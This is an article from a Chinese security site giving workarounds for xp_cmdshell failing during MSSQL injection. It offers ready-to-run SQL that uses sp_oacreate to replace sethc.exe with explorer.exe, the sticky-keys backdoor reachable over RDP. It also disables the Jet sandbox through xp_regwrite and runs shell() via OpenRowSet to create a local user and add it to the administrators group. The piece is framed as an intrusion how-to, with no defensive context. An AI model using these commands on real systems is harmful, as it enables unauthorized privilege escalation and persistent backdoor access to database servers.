首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
mssql数据库注入时exec xp_cmdshell 调用 'CreateProcess' 失败
来源:vfocus.net 作者:vfocus 发布时间:2010-11-30  
微软ms sql 2000/2005 注入时exec xp_cmdshell 调用 'CreateProcess' 失败,错误代码: '5'两种解决办法:

================================================

原因不说了,一般都是cmd.exe被限制权限了,system用户没有权限。解决方法2种:

 

1。替换shift文件(在开启3389情况下)

‍下面两条语句为分别执行的。

这条语句将explorer.exe复制为sethc.exe

declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe','c:\windows\system32\sethc.exe';

这条语句将sethc.exe复制到dllcache目录下

declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe','c:\windows\system32\dllcache\sethc.exe';

另外这两条语句使用到的sp_oacreate存储过程需要使用到odsole70.dll这个文件,所以这个文件的存亡,关系到创建的成功与否。

 

 

2。直接开启acess的沙盘(沙盒),来执行命令:

‍EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user 123 123 /add")');
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators 123 /add")');

==========注意以上如果2000,则将windows目录改成winnt


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·DB-OWNER权限日志备份专用一句话
·一次欺骗带来的血案--入侵实录
·典型性社会工程学渗透实战(图文
·艰难渗透源码出售站点(图文)
·社会工程+老式提权艰难渗透某通
·入侵成人用品购物网站
·记星外主机提权的曲折过程
·对搜狐、网易和TOM三大门户网站
·星外虚拟机系统(星外虚拟机提权"
·利用ewebeditor 5.5 - 6.0 鸡肋
·常用的Churrasco,pr,ms10048,
·一次有意思的提权(G6FTP )
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved